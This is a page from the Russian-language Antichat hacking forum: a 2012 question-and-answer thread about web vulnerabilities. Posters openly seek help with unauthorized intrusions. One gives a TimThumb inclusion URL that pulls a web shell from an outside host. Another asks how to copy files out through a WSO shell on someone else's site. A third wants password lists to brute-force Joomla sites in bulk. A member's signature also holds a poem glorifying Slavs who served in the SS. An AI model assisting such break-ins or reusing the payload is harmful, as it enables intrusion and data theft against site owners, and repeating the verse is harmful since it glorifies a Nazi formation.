HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #381  
Старый 11.06.2012, 23:33
klb
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от cat1vo  
cat1vo said:
А с чего ты взял, что там у тебя инлуд? И какая версия рнр, после обновления 5.3.4 (null байт) уже не работает!
5.2.11 пхп

но раскрутить никак не могу
 
Ответить с цитированием

  #382  
Старый 13.06.2012, 02:00
promarketing
Guest
Сообщений: n/a
Провел на форуме:
3814

Репутация: 0
По умолчанию

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
 
Ответить с цитированием

  #383  
Старый 13.06.2012, 02:11
Weil
Guest
Сообщений: n/a
Провел на форуме:
214

Репутация: 0
По умолчанию

Есть сайт на Drupal, с него недавно были удалены страницы(ранее существовали, теперь 404). Возможно ли создать(воссоздать) страницы с этими определенными именами? Скажем site/node/12345 - движек, я так понял, создает со случайным номером, а нужно именно с определенным!
 
Ответить с цитированием

  #384  
Старый 14.06.2012, 02:15
RuDefc0n
Guest
Сообщений: n/a
Провел на форуме:
7074

Репутация: 0
По умолчанию

Вопрос - чем удобнее всего рипать сайт?

Нужна некая программа, которая используя веб-шелл пройдется по указанным каталогам и сохранит файлы.

Ибо права на чтение есть, хочу сохранить для анализа на случай закрытия уязвимостей.

zipнуть и скачать не получается - объемы адские и не дает - "Internal Error", даже если по 1 каталогу выбирать. (Использую WSO)

Судя по всему стоит ограничение на время выполнения и ничего тут не сделать.

Плюс из всех команд на запуск доступно только proc_open
 
Ответить с цитированием

  #385  
Старый 15.06.2012, 02:04
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

Подскажите, есть что под vBulletin 3.6.8

Спасибо
 
Ответить с цитированием

  #386  
Старый 15.06.2012, 02:27
boortyhuhtyu
Guest
Сообщений: n/a
Провел на форуме:
225312

Репутация: -6
По умолчанию

Цитата:
Сообщение от Pirotexnik  
Pirotexnik said:
Подскажите, есть что под vBulletin 3.6.8
Спасибо
xss было
 
Ответить с цитированием

  #387  
Старый 15.06.2012, 02:57
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

А можно PoC?)
 
Ответить с цитированием

  #388  
Старый 17.06.2012, 23:54
Esse_rationa
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"

Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
 
Ответить с цитированием

  #389  
Старый 18.06.2012, 00:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Esse_rationa  
Esse_rationa said:
Возникла потребность пробрутить базу сайтов joomla. Так как я новичок в этом, то натолкнулся на такую неприступную, для меня "стену", а опытным деятелям данной сферы это раз плюнуть. Так вот: Нужна база паролей. Желательно проверенная с нормальной "проходимостью"
Заранее превелико благодарен ответившему положительно на мой столь нубский вопрос - просьбу)
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #390  
Старый 18.06.2012, 00:56
Esse_rationa
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
HAXTA4OK said:
какой вопрос - такой ответ, может быть ты имелл ввиду базу паролей от joomla а не сайтов? про Базу паролей напиши лучше в соседнем разделе про хеши, возможно там подскажут что лучше....
Возможно. Может я ошибаюсь. Повторюсь: "я пока что в изучении."

1. Софт для брута (именно Joomla) есть. Авторский. В паблике старые версии.

2. К нему прилагается небольшая база паролей (обычный .txt) пароли типа "admin, 12345" и т.д

Так вот той базе паролей для подбора, доверия нет (всего 70кб)

Пробиваемость с неё на уровне 1-max3% от общего кол-ва сайтов.

Собственно первоначальная просьба была направить меня в нужное русло поиска, или Лучше дать базу паролей для брута (пробиваемостью хотя бы 40-60%) Был бы очень благодарен!

Сейчас ориентироваться в обиллии разных баз для брута очень сложно. Их много, а я один ) Все проверить я физически не смогу.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ